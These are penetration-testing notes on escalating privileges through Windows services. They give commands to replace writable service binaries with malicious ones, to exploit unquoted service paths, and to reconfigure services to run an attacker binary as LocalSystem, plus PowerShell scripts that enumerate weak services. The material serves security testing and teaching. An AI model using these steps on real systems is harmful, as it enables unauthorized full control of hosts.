Windows services
You can learn more about Windows services here.
- 🗺️ List services
PS> Get-Service
PS> net start # running services only
PS> sc.exe query # running services with their state; add state= all to include stopped ones
- Get a service's configuration (binary path, start type, account it runs as)
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: xxx
[...]
BINARY_PATH_NAME : C:\[...]\service.exe
[...]
🔥 In CTFs, the low-privileged user often holds SERVICE_STOP/SERVICE_START on the target service, so you can restart it yourself after tampering with it (otherwise you have to wait for a reboot or for the service's next start)
PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx
Notable services: vss, Spooler, wuauserv, etc.
➡️ See also: Potatoes 🔥 and SweetPotato (1.2k ★).
➡️ PrintNightmare (CVE-2021-1675, later also tracked as CVE-2021-34527): vulnerability in the Print Spooler service (Spooler).
➡️ Members of the Server Operators group (present on domain controllers) can start/stop services and change the configuration of some of them, for instance replacing the binary path, which gives code execution as the service account.
Pentester Notes ⚠️
Insecure permissions
If the current user has write, modify or full control on the service binary (or delete/rename rights through its directory), the binary can be swapped for a malicious one (ex: a reverse shell) that the service then runs under its own account. Check the ACL, move the original out of the way, put the payload in its place and restart the service as shown above:
PS> icacls C:\[...]\service.exe # look for (F), (M) or (W) granted to your user or one of your groups
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> copy C:\[...]\malicious.exe C:\[...]\service.exe
PS> icacls C:\[...]\service.exe /grant Everyone:F # make sure the service account can read and execute the new file
Unquoted Service Path
If BINARY_PATH_NAME contains spaces and is not wrapped in quotes, the Service Control Manager (through CreateProcess) tries every prefix of the path that ends at a space, appending .exe, before it reaches the real binary: for $Env:appdata\Vulnerable Program\service.exe it first tries $Env:appdata\Vulnerable.exe, passing the rest of the line (Program\service.exe) as arguments. If the attacker can create files in one of those directories, they drop an executable there and the service runs it under the service account. Check the ACL of the directory the truncated path lands in, not of service.exe itself:
PS> icacls $Env:appdata # look for (W), (M) or (F) granted to your user or one of your groups
PS> move C:\[...]\malicious.exe "$Env:appdata\Vulnerable.exe"
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe
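The two checks above (writable service binary, unquoted path with spaces) can be swept across every service in one go. The following PowerShell is an added example, not code from the original notes: it replays the path lookup CreateProcess performs on an unquoted command line and reports the files and directories the current token can write to. The function and variable names are the example's own; service names and paths come from whatever host it runs on.

```powershell
# Added example (not from the original notes): find services whose binary, binary
# directory, or an unquoted-path "truncation point" directory is writable by us.

# SIDs held by the current token: the user plus every group. An ACE granting one of
# these applies to us. Deny ACEs are ignored, which is fine for triage.
$Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids   = @($Identity.User.Value) + @($Identity.Groups | ForEach-Object { $_.Value })

# Rights that let us replace/alter a file, or create/rename/delete inside a directory;
# these are what icacls prints as (W), (M), (F), (D), WO and WDAC.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions)

function Test-WritableByMe {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($MySids -contains $sid -and (([int]$ace.FileSystemRights -band $WriteMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-PathCandidates {
    # Paths CreateProcess tries, in order, for a service command line. A quoted path
    # has exactly one candidate. For an unquoted path it tries each prefix ending at a
    # space, appending .exe when that prefix has no extension:
    #   C:\Dir With Space\svc.exe -> C:\Dir.exe, C:\Dir With.exe, C:\Dir With Space\svc.exe
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine) -replace '^\\\?\?\\', ''
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return ,$cmd.Substring(1, $end - 1) }
        return ,$cmd.Trim('"')
    }
    $parts = $cmd -split ' '
    $candidates = @()
    for ($i = 1; $i -le $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        if ($prefix.Split('\')[-1] -notmatch '\.') { $prefix += '.exe' }
        $candidates += $prefix
    }
    return $candidates
}

function Find-ServiceBinaryIssues {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $real = $null
        foreach ($cand in Get-PathCandidates $svc.PathName) {
            if (Test-Path -LiteralPath $cand -PathType Leaf -ErrorAction SilentlyContinue) { $real = $cand; break }
            # Not the real binary yet: a file planted here would be started instead of it.
            try { $dir = [System.IO.Path]::GetDirectoryName($cand) } catch { continue }
            if ($dir -and (Test-Path -LiteralPath $dir -PathType Container -ErrorAction SilentlyContinue) -and (Test-WritableByMe $dir)) {
                [pscustomobject]@{ Service = $svc.Name; Issue = 'UnquotedPath'; Target = $cand; RunsAs = $svc.StartName }
            }
        }
        if (-not $real) { continue }
        if (Test-WritableByMe $real) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'WritableBinary'; Target = $real; RunsAs = $svc.StartName }
        } else {
            $dir = [System.IO.Path]::GetDirectoryName($real)
            if (Test-WritableByMe $dir) {
                [pscustomobject]@{ Service = $svc.Name; Issue = 'WritableBinaryDir'; Target = $dir; RunsAs = $svc.StartName }
            }
        }
    }
}

Find-ServiceBinaryIssues | Format-Table -AutoSize
```

Run it as the low-privileged user you are assessing; the RunsAs column tells you what you gain (LocalSystem being the prize). It is the scripted version of the classic one-liner `wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """`, with the difference that it also confirms you can actually write to the directory the truncated path resolves into.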
Insecure Service Permissions
Here the service object itself (not its binary) grants a low-privileged user rights to modify it: typically SERVICE_CHANGE_CONFIG (change the binary path or the account it runs as), WRITE_DAC/WRITE_OWNER (rewrite its ACL and grant yourself anything) or outright SERVICE_ALL_ACCESS. Check with Sysinternals accesschk (for one service: accesschk.exe -ucqv xxx; to sweep everything writable by a group: accesschk.exe -uwcqv "Authenticated Users" *) or dump the raw descriptor with sc.exe sdshow xxx. With SERVICE_CHANGE_CONFIG, repoint the service to your binary and make it run as LocalSystem, then restart it as shown above. Mind sc.exe's syntax: a mandatory space after each "=", and always sc.exe rather than sc, which in PowerShell is an alias for Set-Content.
PS> # LocalSystem is the highest privileged local account available
PS> sc.exe config xxx binPath= "C:\[...]\malicious.exe" obj= LocalSystem
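Without accesschk on the box, the same answer can be pulled from sc.exe sdshow and decoded with .NET. The following PowerShell is an added example, not code from the original notes: it parses the service's SDDL, keeps only the ACEs that name one of the current token's SIDs, and reports the service rights held. The right values are the winsvc.h constants; the function names and the -Sddl parameter (which lets you feed a captured descriptor instead of querying live) are the example's own.

```powershell
# Added example (not from the original notes): which service rights does my token
# hold on a given service? Access-right values are the winsvc.h constants.

$ServiceRights = [ordered]@{
    SERVICE_QUERY_CONFIG         = 0x00001   # SDDL: CC
    SERVICE_CHANGE_CONFIG        = 0x00002   # SDDL: DC  -> can set binPath= / obj=
    SERVICE_QUERY_STATUS         = 0x00004   # SDDL: LC
    SERVICE_ENUMERATE_DEPENDENTS = 0x00008   # SDDL: SW
    SERVICE_START                = 0x00010   # SDDL: RP
    SERVICE_STOP                 = 0x00020   # SDDL: WP
    SERVICE_PAUSE_CONTINUE       = 0x00040   # SDDL: DT
    SERVICE_INTERROGATE          = 0x00080   # SDDL: LO
    SERVICE_USER_DEFINED_CONTROL = 0x00100   # SDDL: CR
    DELETE                       = 0x10000   # SDDL: SD
    READ_CONTROL                 = 0x20000   # SDDL: RC
    WRITE_DAC                    = 0x40000   # SDDL: WD  -> rewrite the ACL, grant yourself anything
    WRITE_OWNER                  = 0x80000   # SDDL: WO
}
$SERVICE_ALL_ACCESS = 0xF01FF
$GENERIC_ALL        = 0x10000000
$GENERIC_WRITE      = 0x40000000

function Get-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name)
    # sc.exe explicitly: in PowerShell, sc alone is an alias for Set-Content.
    # sdshow prints the SDDL on a single line padded with blank lines.
    $lines = & sc.exe sdshow $Name 2>&1 | ForEach-Object { "$_".Trim() } | Where-Object { $_ }
    $sddl  = $lines | Where-Object { $_ -match '^D:' } | Select-Object -First 1
    if (-not $sddl) { throw "sc.exe sdshow $Name failed: $($lines -join ' ')" }
    return $sddl
}

function Get-MyServiceRights {
    param([Parameter(Mandatory)][string]$Name, [string]$Sddl)
    if (-not $Sddl) { $Sddl = Get-ServiceSddl -Name $Name }
    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $sd     = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)

    $allowed = 0; $denied = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
        $mask = $ace.AccessMask
        # Expand generic rights the way the SCM maps them for service objects.
        if ($mask -band $GENERIC_ALL)   { $mask = $mask -bor $SERVICE_ALL_ACCESS }
        if ($mask -band $GENERIC_WRITE) { $mask = $mask -bor $ServiceRights.SERVICE_CHANGE_CONFIG -bor $ServiceRights.READ_CONTROL }
        switch ($ace.AceQualifier) {
            'AccessAllowed' { $allowed = $allowed -bor $mask }
            'AccessDenied'  { $denied  = $denied  -bor $mask }
        }
    }
    # Simplification: a deny bit cancels the matching allow bit regardless of ACE order.
    $effective    = $allowed -band (-bnot $denied)
    $names        = @($ServiceRights.Keys | Where-Object { ($effective -band $ServiceRights[$_]) -ne 0 })
    $takeoverMask = $ServiceRights.SERVICE_CHANGE_CONFIG -bor $ServiceRights.WRITE_DAC -bor $ServiceRights.WRITE_OWNER
    [pscustomobject]@{
        Service     = $Name
        Rights      = $names -join ', '
        CanTakeOver = (($effective -band $takeoverMask) -ne 0)
        CanRestart  = ((($effective -band $ServiceRights.SERVICE_START) -ne 0) -and
                       (($effective -band $ServiceRights.SERVICE_STOP) -ne 0))
    }
}

# Live check of one service (run as the low-privileged user you are assessing):
#   Get-MyServiceRights -Name 'xxx'
# Offline demonstration on a constructed weak descriptor: Authenticated Users (AU) get
# DC (SERVICE_CHANGE_CONFIG) plus RP/WP (start/stop), so CanTakeOver and CanRestart are True.
Get-MyServiceRights -Name 'demo' -Sddl 'D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)'
# Follow-up once CanTakeOver is True (note the space after each "="):
#   sc.exe config xxx binPath= "C:\[...]\malicious.exe" obj= LocalSystem
#   sc.exe stop xxx ; sc.exe start xxx
```

Reading sc.exe sdshow only needs READ_CONTROL on the service, which Authenticated Users normally hold, so this works from an unprivileged shell. Running it as an administrator is pointless: the BA entry grants everything. A result of CanTakeOver without CanRestart still pays off after the next reboot or whenever the service is next started.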
To-do
Stuff that I found, but never read/used yet.
- Microsoft recommends running services under dedicated least-privilege accounts (LocalService, NetworkService, virtual service accounts, gMSAs) rather than LocalSystem.
- Many services nevertheless run as LocalSystem (NT AUTHORITY\SYSTEM), so hijacking one of them gives full control of the host.
- Through the SCM a service can be given recovery actions, including "run a program" when it fails (configured with sc.exe failure, shown by sc.exe qfailure xxx). If such a program is configured and its binary or path is attacker-writable, crashing the service runs the attacker's program.